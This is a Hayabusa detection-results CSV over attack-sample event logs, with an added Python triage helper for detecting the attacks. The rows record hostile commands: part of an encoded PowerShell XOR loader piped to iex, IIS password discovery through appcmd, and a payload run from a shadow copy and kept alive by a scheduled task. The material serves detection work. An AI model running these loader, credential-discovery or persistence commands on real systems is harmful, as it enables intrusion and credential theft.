GEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:19.403 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:19.473 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:19.563 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Line Number: 0"" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:19.784 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Line Number: 0"" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:19.894 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:19.964 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:20.034 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Description: Cannot read configuration file due to insufficient permissions"" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:20.124 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Description: Cannot read configuration file due to insufficient permissions"" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:20.204 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:20.305 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:20.435 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir "". )"" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:20.555 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir "". )"" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-28 00:12:38.241 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c whoami /groups : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:38.290 +09:00,IEWIN7,1,informational,Process Creation,Command: whoami /groups : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c whoami /groups ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:38.290 +09:00,IEWIN7,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:38.290 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:38.290 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:43.990 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:44.055 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state : Path: C:\Windows\System32\wbem\WMIC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:45.405 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:45.491 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state : Path: C:\Windows\System32\wbem\WMIC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:47.402 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:47.478 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:47.478 +09:00,IEWIN7,1,medium,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:48.655 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:48.763 +09:00,IEWIN7,1,informational,Process Creation,"Command: vssadmin List Shadows : Path: C:\Windows\System32\vssadmin.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:48.827 +09:00,IEWIN7,1,informational,Process Creation,"Command: find ""Shadow Copy Volume"" : Path: C:\Windows\System32\find.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:54.447 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:54.544 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe : Path: C:\Windows\System32\wbem\WMIC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,Suspicious WMI Execution,,rules/sigma/process_creation/win_susp_wmi_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:54.632 +09:00,IEWIN7,1,informational,Process Creation,Command: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe : Path: \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:59.519 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:59.578 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: C:\Windows\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" : Path: C:\Windows\System32\schtasks.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
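Two things in the rows above deserve more than the rule hits they received: the appcmd.exe discovery rows carry their real payload only in the parent powershell.exe -enc argument (base64 of UTF-16LE, here an XOR file loader that reads two files from C:\Windows\Temp, decrypts them with a fixed key and pipes the result to iex), and the VSS persistence rows end with svhost64.exe launched straight from \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7, where the Sigma rules flag the shadow-copy creation and the wmic call but the execution row itself stays informational. The Python below is an added example, not part of the Hayabusa sample results and not Hayabusa's own code: it parses the Details column layout used in this CSV (Command / Path / User / Parent Command, with an optional leading Rule), decodes -enc command lines, and flags images executed from a shadow-copy device path. The sample rows are constructed from the rows above with a short stand-in loader script in place of the real blob; the function names and finding messages are this example's own.

```python
"""Triage helpers for Hayabusa CSV rows (added example, not Hayabusa code).

Parses the Details column layout used in the results file, decodes
PowerShell -enc arguments (base64 of UTF-16LE) and flags images launched
from a Volume Shadow Copy device path. The sample rows are constructed.
"""
import base64
import csv
import io
import re

DETAILS_RE = re.compile(
    r"^(?:Rule: (?P<rule>.*?) : )?Command: (?P<cmd>.*?) : Path: (?P<path>.*?)"
    r" : User: (?P<user>.*?) : Parent Command: (?P<parent>.*?)\s*$"
)
# PowerShell accepts any unambiguous prefix: -e, -ec, -enc, -encodedcommand.
ENC_RE = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/]{16,}={0,2})", re.IGNORECASE)
# Matches the Win32 form \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN\...
# as well as the NT path Sysmon records in the Image field.
SHADOW_RE = re.compile(r"HarddiskVolumeShadowCopy\d+", re.IGNORECASE)
HEADER = ["Timestamp", "Computer", "EventID", "Level", "RuleTitle", "Details", "RulePath", "FilePath"]


def encode_powershell(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the script carried by '-enc <b64>' in cmdline, or None."""
    m = ENC_RE.search(cmdline)
    if m is None:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # bad padding or odd byte count
        return None


def parse_details(details: str):
    """Split the Details column into its labelled sub-fields (dict or None)."""
    m = DETAILS_RE.match(details)
    return m.groupdict() if m else None


def triage_row(row: dict) -> list:
    """Findings for one Sysmon event 1 row; empty list when nothing stands out."""
    findings = []
    if row.get("EventID") != "1":
        return findings
    d = parse_details(row["Details"])
    if d is None:
        return findings
    for field in ("cmd", "parent"):
        script = decode_encoded_command(d[field])
        if script is not None:
            findings.append(f"encoded PowerShell in {field}: {script}")
    if SHADOW_RE.search(d["path"]) or SHADOW_RE.search(d["cmd"]):
        findings.append(f"image executed from a shadow copy: {d['path']}")
    return findings


def triage_csv(text: str) -> dict:
    """Map Timestamp -> findings for every row that produced any."""
    out = {}
    for row in csv.DictReader(io.StringIO(text)):
        findings = triage_row(row)
        if findings:
            out[row["Timestamp"]] = findings
    return out


# Constructed sample: three rows mirroring the results above, with a short
# stand-in loader script encoded in place of the real -enc blob.
SAMPLE_SCRIPT = "$p='C:\\Windows\\Temp\\stage.txt';[IO.File]::ReadAllText($p)|iex"
PS = '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"'
SAMPLE_ROWS = [
    ["2019-05-27 10:29:19.233 +09:00", "IEWIN7", "1", "informational", "Process Creation",
     'Command: "C:\\Windows\\System32\\inetsrv\\appcmd.exe" list vdir /text:password'
     " : Path: C:\\Windows\\System32\\inetsrv\\appcmd.exe : User: IIS APPPOOL\\DefaultAppPool"
     f" : Parent Command: {PS} -nop -noni -enc {encode_powershell(SAMPLE_SCRIPT)}",
     "rules/hayabusa/sysmon/events/1_ProcessCreation.yml", "sample.evtx"],
    ["2019-05-28 00:12:54.632 +09:00", "IEWIN7", "1", "informational", "Process Creation",
     "Command: \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy7\\Windows\\Temp\\svhost64.exe"
     " : Path: \\Device\\HarddiskVolumeShadowCopy7\\Windows\\Temp\\svhost64.exe"
     " : User: NT AUTHORITY\\SYSTEM"
     " : Parent Command: C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
     "rules/hayabusa/sysmon/events/1_ProcessCreation.yml", "sample.evtx"],
    ["2019-06-15 07:23:23.405 +09:00", "IEWIN7", "1", "informational", "Process Creation",
     'Command: "C:\\Windows\\system32\\eventvwr.exe" : Path: C:\\Windows\\System32\\eventvwr.exe'
     " : User: IEWIN7\\IEUser : Parent Command: C:\\Windows\\Explorer.EXE",
     "rules/hayabusa/sysmon/events/1_ProcessCreation.yml", "sample.evtx"],
]


def build_sample_csv() -> str:
    """Serialise SAMPLE_ROWS with the same header as the results file."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    writer.writerow(HEADER)
    writer.writerows(SAMPLE_ROWS)
    return buf.getvalue()


SAMPLE_CSV = build_sample_csv()

if __name__ == "__main__":
    for ts, found in triage_csv(SAMPLE_CSV).items():
        for item in found:
            print(ts, "-", item)
```

Run against a real Hayabusa CSV by replacing SAMPLE_CSV with the file contents; the shadow-copy check is deliberately applied to both the Command and the Path fields because the Win32 GLOBALROOT spelling appears in the wmic and schtasks command lines while Sysmon records the launched image under its NT device path.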
2019-05-28 11:13:52.171 +09:00,IEWIN7,1,informational,Process Creation,"Command: vshadow.exe -nw -exec=c:\windows\System32\osk.exe c:\ : Path: C:\ProgramData\vshadow.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
2019-05-28 11:13:52.429 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Process Launched via DCOM : Command: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot11"" """" """" ""6350c17eb"" ""00000000"" ""000005AC"" ""00000590"" : Path: C:\Windows\System32\drvinst.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
2019-05-28 11:13:53.507 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: IEWIN7\IEUser : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
2019-05-28 11:14:48.819 +09:00,IEWIN7,1,informational,Process Creation,"Command: vshadow.exe -nw -exec=c:\windows\System32\notepad.exe c:\ : Path: C:\ProgramData\vshadow.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
2019-05-28 11:14:49.194 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Process Launched via DCOM : Command: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot12"" """" """" ""6d110b0a3"" ""00000000"" ""000005B8"" ""000004B0"" : Path: C:\Windows\System32\drvinst.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
2019-05-28 11:14:50.413 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\windows\System32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: vshadow.exe -nw -exec=c:\windows\System32\notepad.exe c:\",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
2019-06-15 07:22:17.988 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\a.exe"" : Path: C:\Users\IEUser\Downloads\a.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
